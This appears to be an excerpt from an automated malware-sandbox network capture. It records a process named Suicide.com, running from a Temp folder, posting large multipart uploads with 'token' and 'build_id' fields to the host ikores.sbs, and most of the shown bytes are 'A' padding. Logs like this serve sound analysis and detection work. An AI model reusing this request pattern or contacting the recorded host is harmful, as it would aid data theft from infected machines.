                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:36 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:37 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    19192.168.2.4499035.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:37 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----7YC2NOZMOZUAIEKXLX4W
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 393697
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 37 59 43 32 4e 4f 5a 4d 4f 5a 55 41 49 45 4b 58 4c 58 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 32 4e 4f 5a 4d 4f 5a 55 41 49 45 4b 58 4c 58 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 32 4e 4f 5a 4d 4f 5a 55 41 49 45 4b 58 4c 58 34 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------7YC2NOZMOZUAIEKXLX4WContent-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------7YC2NOZMOZUAIEKXLX4WContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------7YC2NOZMOZUAIEKXLX4WCont
                                                                                                                                                                                    2024-12-06 08:42:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
